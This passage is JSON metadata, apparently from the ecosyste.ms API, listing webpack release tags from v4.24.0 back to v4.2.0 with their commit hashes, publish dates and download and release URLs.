repositories/webpack%2Fwebpack/tags/v4.24.0/manifests"},{"name":"v4.23.1","sha":"607cf70eddd213a690585276f7124963536781e7","kind":"tag","published_at":"2018-10-25T08:26:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.23.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.1/manifests"},{"name":"v4.23.0","sha":"a4feb6e15ff7ac19bab1a458de369a887dde44fe","kind":"tag","published_at":"2018-10-24T15:45:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.23.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.0/manifests"},{"name":"v4.22.0","sha":"894eca20bd678ca5473cfca28f332a7322c64b8e","kind":"tag","published_at":"2018-10-21T09:34:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.22.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.22.0/manifests"},{"name":"v4.21.0","sha":"432d2a3f174b08d5f4f7de018799c97a18efa1fd","kind":"tag","published_at":"2018-10-17T17:47:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.21.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.21.0/manifests"},{"name":"v4.20.2","sha":"5c5e902c8e89afeb51ad130f12a908b89d627fc5","kind":"tag","published_at":"2018-09-25T20:31:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.2/manifests"},{"name":"v4.20.1","sha":"91e9dd77062797e3e716485f295d32a5cab57042","kind":"tag","published_at":"2018-09-25T13:25:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.1/manifests"},{"name":"v4.20.0","sha":"c4d8a3c8d67239f6457fd7560d9bea14524ff4f0","kind":"tag","published_at":"2018-09-25T07:15:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.0/manifests"},{"name":"v4.19.1","sha":"b7121c15e1cc810ead6aa0f4b2aad4666c072257","kind":"tag","published_at":"2018-09-18T07:56:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.19.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.1/manifests"},{"name":"v4.19.0","sha":"6bf832398c3905e06300596caddb073c583d94c4","kind":"tag","published_at":"2018-09-13T22:04:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.19.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.0/manifests"},{"name":"v4.18.1","sha":"c51a1bab94e4ff8ffca443e4fcb038bc4911e65e","kind":"tag","published_at":"2018-09-13T10:22:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.18.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.1/manifests"},{"name":"v4.18.0","sha":"ee7d9485fa30d1d3d5adbfdfb52c8f57ae8b439e","kind":"tag","published_at":"2018-09-10T15:34:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.18.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.0/manifests"},{"name":"v4.17.3","sha":"ee27d36e7cb0bed3ca32911165bbf01fef993e48","kind":"tag","published_at":"2018-09-10T14:25:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.3/manifests"},{"name":"v4.17.2","sha":"dfe6379052598a00f13bfa4f34ac73856ddf3dd0","kind":"tag","published_at":"2018-09-03T17:25:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.2/manifests"},{"name":"v4.17.1","sha":"ff3ef5eb284ddcd3da8c3f5bef6318e873779ffe","kind":"tag","published_at":"2018-08-22T09:50:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.1/manifests"},{"name":"v4.17.0","sha":"6f1f18f84dee330ec582d4e9c075c47c9a732102","kind":"tag","published_at":"2018-08-21T08:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.0/manifests"},{"name":"v4.16.5","sha":"025338cc91a867768325120d325b341bdcdc4321","kind":"tag","published_at":"2018-08-06T07:13:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.5/manifests"},{"name":"v4.16.4","sha":"1e9d98cb4e52a6efc58f516aa7451d1faa6347ba","kind":"tag","published_at":"2018-08-02T13:46:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.4/manifests"},{"name":"v4.16.3","sha":"482ff200303e84a65bdd5c456ce232309a6ce450","kind":"tag","published_at":"2018-07-27T10:14:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.3/manifests"},{"name":"v4.16.2","sha":"0d4c87fcf261de02a6ecfb05faab235c5a2a92dc","kind":"tag","published_at":"2018-07-23T09:51:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.2/manifests"},{"name":"v4.16.1","sha":"fa02f3d03344913f0a02d29cb363581bc8535bef","kind":"tag","published_at":"2018-07-16T08:27:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.1/manifests"},{"name":"v4.16.0","sha":"18d33c630f799e99e5e43fc0b6931713dc976529","kind":"tag","published_at":"2018-07-11T08:45:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.0/manifests"},{"name":"v4.15.1","sha":"81149be5c1cd2a3ce70c3abcc179c5070fd6dd1c","kind":"tag","published_at":"2018-07-05T13:32:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.15.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.1/manifests"},{"name":"v4.15.0","sha":"bdd4442c449b41d2a0ea7ed0de9cded3ba0e2e31","kind":"tag","published_at":"2018-07-04T19:42:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.0/manifests"},{"name":"v4.14.0","sha":"190cf7b017c9d4106c83553a1de652e53452b095","kind":"tag","published_at":"2018-06-29T12:12:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.14.0/manifests"},{"name":"v4.13.0","sha":"e3678aa3767aaeb26ebcf5e3028412bbebdb4f9f","kind":"tag","published_at":"2018-06-28T15:34:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.13.0/manifests"},{"name":"v4.12.2","sha":"c384c3fb1c162667d001f467db05e73570ddd4d2","kind":"tag","published_at":"2018-06-27T05:39:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.2/manifests"},{"name":"v4.12.1","sha":"8a7597aa6eb2eef66a8f9db3a0c49bcb96022a94","kind":"tag","published_at":"2018-06-24T08:44:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.1/manifests"},{"name":"v4.12.0","sha":"02a955b4335cb7eeeb4dd1c96ef5407c6bcea158","kind":"tag","published_at":"2018-06-08T07:24:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.0/manifests"},{"name":"v4.11.1","sha":"956c0b12dcc274f5e5725fc5abc51f805d916f43","kind":"tag","published_at":"2018-06-06T07:02:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.11.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.1/manifests"},{"name":"v4.11.0","sha":"e2fe2009d9f2b26a8d751ea89e184d6ec96e37d7","kind":"tag","published_at":"2018-06-05T11:25:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.0/manifests"},{"name":"v4.10.2","sha":"b8266d09a9472344a4894f1d8cf4067eb452019c","kind":"tag","published_at":"2018-05-30T08:29:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.2/manifests"},{"name":"v4.10.1","sha":"b80296f0c8b3907a8c96e4146bfb21746346fbb0","kind":"tag","published_at":"2018-05-29T13:38:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.1/manifests"},{"name":"v4.10.0","sha":"ba703401d580ad623af17fe96ed98b4d801e0313","kind":"tag","published_at":"2018-05-28T23:12:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.0/manifests"},{"name":"v4.9.2","sha":"317fb353518179c50342b1ac826d393a85b5903e","kind":"tag","published_at":"2018-05-28T20:28:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.2/manifests"},{"name":"v4.9.1","sha":"94cd709b06ffc7071b3505a746f0bb17fb7e3c33","kind":"tag","published_at":"2018-05-25T21:30:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.1/manifests"},{"name":"v4.9.0","sha":"bb0731d7897fb8a7369efd9d2f9bf0a8c08d546d","kind":"tag","published_at":"2018-05-25T20:17:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.0/manifests"},{"name":"v4.8.3","sha":"9a72294918064d6b976538adf808808de948585f","kind":"tag","published_at":"2018-05-12T20:56:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.3/manifests"},{"name":"v4.8.2","sha":"c92eabd3be44d4162be0affc9ef368624b0a6e51","kind":"tag","published_at":"2018-05-11T16:13:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.2/manifests"},{"name":"v3.12.0","sha":"cce33c206abaeef26d06b62102adf74a989a4696","kind":"tag","published_at":"2018-05-11T14:50:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.12.0/manifests"},{"name":"v4.8.1","sha":"2986ab1a18e895ac3f2546ac0c70bf73c0fdb679","kind":"tag","published_at":"2018-05-07T21:03:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.1/manifests"},{"name":"v4.8.0","sha":"586f9a21768e8bbc6bead6e564a6c7981a42f2d8","kind":"tag","published_at":"2018-05-07T11:39:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.0/manifests"},{"name":"v4.7.0","sha":"673c103715b5439bf72ed9767f5189b92ce7d428","kind":"tag","published_at":"2018-05-04T11:57:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.7.0/manifests"},{"name":"v4.6.0","sha":"e7c8fa414b718ac98d94a96e2553faceabfbc92f","kind":"tag","published_at":"2018-04-17T16:23:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.6.0/manifests"},{"name":"v4.5.0","sha":"e400445445a2f91d19aa8c79aa7b34b66011e661","kind":"tag","published_at":"2018-04-04T13:07:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.5.0/manifests"},{"name":"v4.4.1","sha":"0e404b8683d79052e3a6b42743bd3061f17a5a5d","kind":"tag","published_at":"2018-03-29T15:28:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.1/manifests"},{"name":"v4.4.0","sha":"e3bb8c9c8f5a30884b4df01bfbbc772cc1fb8cda","kind":"tag","published_at":"2018-03-29T14:57:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.0/manifests"},{"name":"v4.3.0","sha":"54ceb3c04d513ef5c7b78eaf4d391d14cfbe8282","kind":"tag","published_at":"2018-03-27T09:00:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.3.0/manifests"},{"name":"v4.2.0","sha":"d668a23fdc69c61ab80ec8db89a5b49778559534","kind":"tag","published_at":"2018-03-21T08:26:10.000Z","download_url":"https://codeload.github.com/webp